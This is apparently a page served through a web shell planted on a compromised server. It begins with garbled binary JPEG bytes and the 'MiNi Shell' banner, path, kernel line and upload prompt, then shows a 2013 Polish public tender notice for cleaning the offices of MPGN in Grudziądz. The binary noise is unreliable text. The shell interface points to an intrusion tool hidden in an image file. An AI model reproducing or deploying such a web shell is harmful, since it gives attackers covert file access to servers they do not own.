JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/167428-N-2013.html

<p class="kh_header"><b>Grudziądz: Sprzatanie pomieszczeń biurowych MPGN Sp. z o.o. w Grudziądzu w okresie od 01.07.2013r. do 30.06.2014r.</b><br>
<b>Numer ogłoszenia: 167428 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o. w Grudziądzu , ul. Mickiewicza 23, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4512034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spólka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzatanie pomieszczeń biurowych MPGN Sp. z o.o. w Grudziądzu w okresie od 01.07.2013r. do 30.06.2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi: Sprzątanie pomieszczeń biurowych  o pow. 945,70 m2 w Biurach Obsługi Mieszkańców Nr 1, Nr 2, Nr 3 i przy ul. Mickiewicza 23 w Grudziądzu w okresie od 01.07.2013r. do 30.06.2014r.      
Powierzchnie  pomieszczeń biurowych  MPGN  do sprzątania:
Mickiewicza 23: Powierzchnia 533,34m2 - płytki ceramiczne, 163,66m2 - panele szwedzkie; Toaleta (powierzchnia glazury) 148,80m2; Zaplecze socjalne (powierzchnia glazury) 10,24 m2; 
BOM-1: Powierzchnia 74,50m2 - płytki ceramiczne, Toaleta (powierzchnia glazury) 22,20m2; Zaplecze socjalne (powierzchnia glazury) 3,80 m2;
BOM-2: Powierzchnia 77,20m2 - płytki ceramiczne, Toaleta (powierzchnia glazury) 14,73m2; Zaplecze socjalne (powierzchnia glazury) 1,51m2;
BOM-3: Powierzchnia 41,00m2 - płytki ceramiczne, 56,00m2 - panele szwedzkie; Toaleta (powierzchnia glazury) 30,00m2; Zaplecze socjalne (powierzchnia glazury) 20,00 m2; 

Całkowita  powierzchnia  pomieszczeń biurowych przeznaczonych do sprzątania wynosi 945,70 m2

Wykonujący usługę zaopatruje się we własnym zakresie w narzędzia, materiały,
środki do utrzymania czystości pomieszczeń:
-papier toaletowy - min. 3-warstwowy, biały, wielkość dopasowana do standardowych wieszaków, 
-ręczniki papierowe - białe, rozmiar 21x25, typ ZZ składanka
-ręczniki kuchenne - min. 2 - warstwowy, biały, długość rolki - 22 cm, (Sekretariat Sp.)
-mydło w płynie - nawilżające skórę, zawierające naturalny składnik antybakteryjny, 
o łagodnym zapachu,
-worki na śmieci - mocne, dopasowane do wielkości pojemnika,
-płyn do mycia naczyń,
-kostki lub żel do WC,
-odświeżacze  powietrza w aerozolu oraz stojący żelowy - po 1 szt. z każdego rodzaju na każdą toaletę,
-środek czyszczący do mebli - w aerozolu, niepozostawiający smug i zacieków, usuwający kurz oraz zapobiegający późniejszemu osadzaniu,
-mleczko do czyszczenia WC i umywalek - pozwala utrzymać powierzchnię w stanie czystości, nie rysuje powierzchni, usuwa osady z kamienia i rdzy,
-płyn do glazury, płytek oraz paneli podłogowych - usuwający kurz i brud pozostawiając świeży zapach oraz nadając połysk czyszczonym powierzchniom, 
-płyn do szyb - szybko czyści okna i powierzchnie zmywalne, niepozostawiający zacieków, nadający przyjemny zapach
-płyn odkażający do mycia muszli klozetowych - czyszcząco - dezynfekujący, usuwający kamień, bakterie, wirusy i grzyby.
Ilość zatrudnionych pracowników w MPGN Sp. z o.o.  -   98 osoby
Wyposażenie: 
ul. Mickiewicza 23: Drzwi zewnętrzne 11, Drzwi wewnętrzne 55, Okna ilość 49 pow. 110,30m2, Muszle ustępowe 10, Umywalki 10, Zlewozmywaki 2, Lustra 8; 
BOM-1: Drzwi zewnętrzne 1, Drzwi wewnętrzne 9, Okna ilość 6 pow. 14,60m2, Muszle ustępowe 2, Umywalki 1, Zlewozmywaki 2, Lustra 2;
BOM-2: Drzwi zewnętrzne 1, Drzwi wewnętrzne 3, Okna ilość 7 pow. 11,56m2, Muszle ustępowe 1, Umywalki 1, Zlewozmywaki 2, Lustra 1;
BOM-2: Drzwi zewnętrzne 1, Drzwi wewnętrzne 9, Okna ilość 6 pow. 17,70m2, Muszle ustępowe 2, Umywalki 2, Zlewozmywaki 1, Lustra 1;
Przez sprzątanie rozumie się przez:
Czynności wykonywane codziennie:
-zamiatanie lub odkurzanie oraz mycie podłóg w pomieszczeniach biurowych, korytarzach, WC,
-utrzymanie w czystości mebli biurowych z użyciem środków do tego przeznaczonych,
-opróżnianie śmieci z pojemników w pokojach, toaletach, wymiana worków, mycie pojemników, 
-opróżnianie niszczarek,
-mycie i dezynfekowanie muszli ustępowych, 
-mycie umywalek, zlewów, armatury oraz innych przedmiotów chromowanych, luster, pojemników na mydło i papier, 
-uzupełnianie papieru toaletowego, ręczników papierowych, ręczników kuchennych 
(w Sekretariacie), odświeżaczy,
-włączenie, opróżnienie zmywarki, w przypadku pozostawienia naczyń - mycie, osuszenie, ułożenie naczyń w Sekretariacie Spółki (po godzinach urzędowania),
-czyszczenie wycieraczek przy drzwiach wejściowych.
Czynności wykonywane 1 raz w tygodniu lub wg potrzeby:
-odkurzanie oraz mycie parapetów,
-odkurzanie na sucho zewnętrznych obudów urządzeń technicznych i elektronicznych, takich jak: telefony, komputery, ksera, drukarki i inny sprzęt drobny,
Czynności wykonywane 1 raz w miesiącu lub wg potrzeby:
-czyszczenie osłon okablowania sieci komputerowej, kontaktów, wyłączników,
-odkurzanie tapicerki mebli biurowych,
-odkurzanie oraz mycie kaloryferów,
-odkurzanie kwiatów oraz dekoracji ściennych,
-mycie powierzchni przeszklonych,
-mycie glazury w toaletach oraz zapleczach socjalnych,
-mycie szafek łazienkowych.
Czynności wykonywane 1 raz na kwartał (do 31.03., 31.06., 31.09., 31.12.) 
lub wg potrzeby:
-odkurzanie oraz mycie drzwi wewnętrznych i zewnętrznych,
-mycie szyb i ram okiennych (każdą szybę należy umyć oddzielnie od strony wewnętrznej 
i zewnętrznej) - przy użyciu środków do tego przeznaczonych.
Czynności wykonywane wg potrzeby:
-czyszczenie lamp,
-usuwanie pajęczyn ze ścian oraz sufitów, 
-usuwanie plam i zabrudzeń z mebli tapicerowanych.
Powyższe czynności powinny być wykonane przy użyciu środków dobrej jakości, przeznaczonych do czyszczenia danej powierzchni, nie niszczących jej, zapewniających spodziewany efekt, nie zostawiających smug; środki dezynfekujące i zapachowe nie mogą charakteryzować się drażniącym zapachem. 
Osoby, które będą wykonywały bezpośrednio usługi na rzecz Zamawiającego (sprzątające, 
a także sprawujące bezpośredni  nadzór) nie mogą być skazane za popełnienie przestępstwa/przestępstwa skarbowego.  Do świadczenia  usługi nie mogą być dopuszczone osoby, które figurują w Kartotece Krajowego Rejestru Karnego. Osoby sprzątające, a także sprawujące nadzór, zobowiązane są do znajomości przepisów ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (tekst jednolity: Dz. U. Nr 101, poz. 926 ze zm.). Osoby, którymi będzie posługiwał  się Wykonawca,  przed przystąpieniem do świadczenia usługi muszą zostać przeszkolone w szczególności w zakresie bezpieczeństwa i higieny pracy, a także  przepisów p. pożarowych. Szkolenia Wykonawca przeprowadzi własnym staraniem i na własny koszt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 1000,00 zł 
słownie: tysiąc złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować realizację, w okresie ostatnich 3 lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówień na usługi sprzątania w budynkach użyteczności publicznej związanych ze sprzątaniem pomieszczeń biurowych o wartości min. 30 tys. zł brutto każde, zamówienie wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogów dotyczących dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia  za spełniony, jeśli Wykonawca wykaże osoby które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz informacji o podstawie do dysponowania tymi osobami.
Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż  6 osób, które będą świadczyć usługę sprzątania:
-1 osoba odpowiedzialna za świadczenie usług i kontrolę jakości, wyznaczona osoba musi posiadać minimum czteroletnie doświadczenie w świadczeniu usług i kontroli jakości
-5 osób bezpośrednio wykonujących usługę sprzątania, wyznaczone osoby muszą posiadać minimum roczne doświadczenie w sprzątaniu pomieszczeń biurowych.
W wykazie należy wymienić gdzie poszczególne osoby nabyły doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, że osoby które bedą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane doświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mpgn.grudziadz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami sp. z o.o.
ul. Mickiewicza 23, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami sp. z o.o.
ul. Mickiewicza 23, 86-300 Grudziądz, Sekretariat, wejście A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com